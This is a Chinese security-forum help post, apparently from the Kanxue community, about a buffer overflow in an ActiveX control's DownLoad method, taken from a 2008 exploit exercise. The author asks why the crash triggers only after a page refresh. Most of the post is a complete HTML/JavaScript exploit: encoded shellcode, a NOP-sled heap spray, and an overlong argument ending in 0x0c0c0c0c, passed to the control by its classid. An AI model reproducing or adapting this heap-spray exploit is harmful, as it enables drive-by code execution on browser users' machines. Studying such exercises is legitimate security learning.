-
-
[求助]DownLoad溢出为什么需要刷新一下才能触发
-
2013-8-7 15:36
2135
-
[求助]DownLoad溢出为什么需要刷新一下才能触发
新手第一次问问题,好激动,怎么才能表现出经常问问题的样子。。。
今天没事做了下2008年看雪的两个Explorer题,第二个题fuzz控件DownLoad存在溢出。
Sub DownLoad (
ByVal URL As String ,
ByVal filename As String
)
最后写个html页面,IE6打开时候不会崩,刷新一下才可以触发,这是什么问题。
前边加上堆喷代码打开时候堆喷能够成功,但是不能触发
刷新一下能触发,但是堆喷的东西已经没有了,请问,这是什么问题。。。
代码:
<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<body>
<SCRIPT language="javascript">
var shellcode = unescape("%u68FC੪Ḹ捨톉桏琲纍㏴럛⬄曣㎻匲畨敳呲툳譤ず䮋謌᱉ঋ榋괈樽㠊甞锅埿闸譠㱅䲋砅촃妋̠㏝䟿㒋λ駵븏㨆瓄섈ߊ퀃㯱甜诤警笼妋̜ϝ묬徕垫㵡੪Ḹꥵ桓楯ⅴ敨灸譬叄偐sﱗs");
var nops = unescape("邐邐");
while (nops.length < 0x100000) nops += nops;
nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
nops=nops+shellcode;
var memory = new Array();
for (var i=0;i<200;i++) memory[i] += nops;
var arg1 = '';
while (arg1.length < 0x2ac) arg1+="\x41\x41\x41\x41";
arg1+="\x0c\x0c\x0c\x0c";
var arg2 = "defaultV";
target.DownLoad(arg1,arg2);
</script>
</body>
</html>
DLL传不上,链接http://bbs.pediy.com/showthread.php?t=57317
B题
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
